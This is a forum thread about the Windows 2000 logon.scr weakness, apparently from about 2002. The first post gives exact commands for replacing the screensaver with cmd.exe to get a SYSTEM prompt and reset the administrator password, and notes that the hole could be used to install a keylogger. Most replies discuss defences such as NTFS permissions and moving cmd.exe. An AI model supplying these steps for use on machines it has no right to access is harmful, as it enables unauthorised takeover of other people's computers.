Page 1 of 3 123 LastLast
Results 1 to 10 of 25

Thread: Windows logon.scr hack

  1. #1
    Junior Member
    Join Date
    Jan 2002
    Posts
    11

    Exclamation Windows logon.scr hack

    This is a tip that was posted in this forum for recovering a win2k admin password.

    Here try this>
    If you can log in as an account and it is FAT, drop to DOS start -> run -> cmd, at the C: prompt type the following (assuming default install locations)

    C:\> cd \winnt\system32
    C:\winnt\system32> copy logon.scr logon.scr.old
    C:\winnt\system32> del logon.scr
    C:\winnt\system32> copy cmd.exe logon.scr

    Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to
    C:\> net user administrator <newpassword>
    and then log in with the new account.

    Try this, might work, as long as he didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.
    Let me know if this works.
    Heavy_Deisel



    I tried this out on my work PC. The command prompt came up as advertised. Though I received an "access is denied" error when I tried to change the administrator password or add a new local user, I was able to run regedit.exe and had permissions to modify the registry! I was also able to launch both applications (lotus notes and word) and mmc programs like the group policy editor (gpedit.msc) and Computer management (compmgmt.msc). I haven't really explored what could be done with this hack but it would be pretty easy to install a keystroke logger or a trojan to exploit this weakness. Does anybody have any suggestions for closing this loophole? I know the most obvious is to use NTFS and enforce permissions on files like logon.scr but my bosses insisted that we use FAT32 in order to be able to easily recover data in case of system crashes. I would also be curious as to how someone might use this exploit to gain local administrator access (outside of using a keystroke logger.) Any thoughts? Props out to Mickey05 and Heavy_Diesel for turning me on to this hack. Thanks.
    Humans are the weakest link in the computer security chain...

  2. #2
    remove del rights from logon.scr and you should be safe again ..
    who knows?

  3. #3
    Junior Member
    Join Date
    Jan 2002
    Posts
    11
    our systems use fat32 not ntfs.
    Humans are the weakest link in the computer security chain...

  4. #4
    Senior Member
    Join Date
    Jan 2002
    Posts
    218
    all of the systems i administrate at the air force base use ntfs. for a while, i always installed it as my choice, but it is now a requirment by the dod. fat file systems are pretty much obsolete and any system running 2000 pro or xp should be installed with ntfs to optimize all of the operating systems options and security controls. not that ms will ever be secure or stable, but ntfs is slightly better from what i can tell.

  5. #5
    Senior Member
    Join Date
    Nov 2001
    Posts
    1,255
    Well, you could always reboot the box with a DOS 6.22+ boot disk, then modify the files, that way Win2K isn't there at all to get in the way.
    Chris Shepherd
    The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
    \"Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?\" -- Failed Insult
    Is your whole family retarded, or did they just catch it from you?

  6. #6
    Senior Member
    Join Date
    Jan 2002
    Posts
    682
    we use FAT32 in order to be able to easily recover data in case of system crashes.

    yer bosses are weenies... (they ever heard of backups???)

    the whole point of security procedures is to make things harder...and yes..that sometimes means it's harder for everyone...i've got 30 people here i have to give out new 12 digit complex passwords for them to remember..that's not easy...for them or me...but it is secure-(er)...i could give everyone a pwd like.."password"...real easy to remember..but...

    ntfs is far superior in many ways...including the fact that is quite a bit more fault tolerant (so your data is actually less likely to get fu-ed in the first place...you can also use EFS to encrypt sensitive data...of course that's really hard to get back if you don't have system in place...

    soooo..

    have systems in place...go ntfs...or be unsecure...know that you can get your data easily...but so can anyone else...
    I used to be With IT. But then they changed what IT was. Now what I'm with isn't IT, and what's IT seems scary and weird." - Abe Simpson

  7. #7
    AntiOnline Senior Member souleman's Avatar
    Join Date
    Oct 2001
    Location
    Flint, MI
    Posts
    2,883
    you could probably just rename cmd.exe to something else. Not many people have any need to use it, other then the admins. So if you renamed it to prompt.exe, and only let the admins know it, you will probably be safe. Most people who know about the hole are not going to take time to find what you renamed it. They will just be like "Oh wow, no cmd.exe, gotta find a different script." You could also move cmd.exe so it is in a location that is not in the users path. Only the Administrators path, or no path at all. So you will have to type c:\progs\cmd.exe to start it or something along those lines.
    \"Ignorance is bliss....
    but only for your enemy\"
    -- souleman

  8. #8
    Junior Member
    Join Date
    Jan 2002
    Posts
    11

    Thumbs up

    Originally posted here by zigar



    yer bosses are weenies...
    that sums it up quite nicely.

    I'd trade you to support only 30 users. My team supports over 4000 desktops in over 40 locations! My company likes to talk like security is important but when it comes down to it, we choose convinience over security every time.

    Thanks for the idea Souleman. Moving CMD.EXE is the simple solution I was looking for...
    Humans are the weakest link in the computer security chain...

  9. #9
    Junior Member
    Join Date
    Nov 2001
    Posts
    27
    but if you move the cmd.exe program another attempt at success that i can think of would be to run a system with NT already and just upload a cmd.exe and rename it to logon.scr
    if thats an off the wall suggestion excuse me cause im not very familiar with NT....never liked it...this bug is an example why heh.
    all work and no play makes bios a dull boy

  10. #10
    Junior Member
    Join Date
    Jan 2002
    Posts
    11
    that's a good point bios. the problem here is not so much NT because using ntfs would greatly reduce the risk that this hack could be implemented.
    Humans are the weakest link in the computer security chain...

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •